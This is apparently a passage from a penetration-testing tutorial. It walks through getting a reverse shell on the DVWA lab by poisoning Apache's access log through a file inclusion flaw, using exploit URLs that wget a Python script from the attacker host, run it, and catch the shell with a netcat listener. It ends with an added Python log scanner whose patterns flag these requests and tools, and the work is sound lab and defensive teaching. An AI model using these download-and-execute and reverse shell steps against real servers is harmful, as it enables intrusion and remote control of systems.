Reverse shell with Python

Now, let's assume that Netcat is not installed on the server. We will make use of Python to obtain the shell. As the underlying server is Linux based, by default, Python would be installed on it. We would therefore modify our exploit command as follows:

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=/var/log/apache2/access.log&cmd=wget http://192.168.1.102/exp.py -O /tmp/exp.py

As can be seen, we will create an exploit file written in Python and serve it from our attacker machine. Since, for the current example, both the attacker and the victim are on the same machine, the URL is http://192.168.1.102. The contents of the exploit file are shown here:

Downloading the exploit file will complete the first step of our exploitation process. The second step will be to execute it and get back the listener. This can be executed by accessing the following URL: http://192.168.1.102/dvwa/vulnerabilities/fi/?page=/var/log/apache2/access.log&cmd=python /tmp/exp.py

Let's take a look at this in action:

  1. Download and save the Python exploit in the /tmp folder: http://192.168.1.102/dvwa/vulnerabilities/fi/?page=/var/log/apache2/access.log&cmd=wget http://192.168.1.102/exp.py -O /tmp/exp.py
  2. Validate whether it has saved successfully:

  3. Start the netcat listener on port 4444: nc -nlvp 4444.
  4. Launch the command that invokes the exp.py script to connect back to the attacker box: http://192.168.1.102/dvwa/vulnerabilities/fi/?page=/var/log/apache2/access.log&cmd=python /tmp/exp.py.

Let's now see whether our listener has obtained the shell:

As we can see from the preceding screenshot, we have successfully obtained the shell.
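
Both requests in the procedure above leave a recognizable trace in the Apache access log: a page parameter that points at a log file, and a cmd parameter that carries a tool name. The following detection sketch is an added example, not code from the book; the sample log lines, the documentation-range IP addresses and the reason labels are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache common/combined log prefix: host ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (.*?) HTTP/[\d.]+" (\d{3})')
# Values an include parameter such as "page" should never carry
INCLUDE_RE = re.compile(r'(/var/log/|/proc/self/|\.\./|access\.log|error\.log)', re.I)
# Tools named in this chapter (wget, python, nc) plus common equivalents
CMD_RE = re.compile(r'\b(wget|curl|python[0-9.]*|nc|bash|sh)\b', re.I)

def classify(line):
    """Return (client_ip, status, reasons) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target, status = m.group(1), m.group(2), int(m.group(3))
    # parse_qs percent-decodes values, so %20 and %2F are normalised before matching
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    reasons = set()
    for name, values in params.items():
        for value in values:
            if name == "page" and INCLUDE_RE.search(value):
                reasons.add("log-or-traversal-include")
            elif name != "page" and CMD_RE.search(value):
                reasons.add("command-in-parameter:" + name)
    return (ip, status, sorted(reasons)) if reasons else None

def scan(lines):
    """Classify every line and keep only the flagged ones."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (documentation-range IPs), not taken from a real server
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /dvwa/vulnerabilities/fi/'
    '?page=include.php HTTP/1.1" 200 4321',
    '192.0.2.77 - - [01/Jan/2024:10:01:00 +0000] "GET /dvwa/vulnerabilities/fi/'
    '?page=/var/log/apache2/access.log&cmd=wget%20http://192.0.2.77/exp.py'
    '%20-O%20/tmp/exp.py HTTP/1.1" 200 9876',
    '192.0.2.77 - - [01/Jan/2024:10:02:00 +0000] "GET /dvwa/vulnerabilities/fi/'
    '?page=/var/log/apache2/access.log&cmd=python%20/tmp/exp.py HTTP/1.1" 200 9876',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A hit with both reasons and a 200 status is worth correlating with new files under /tmp and with outbound connections from the web server account.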
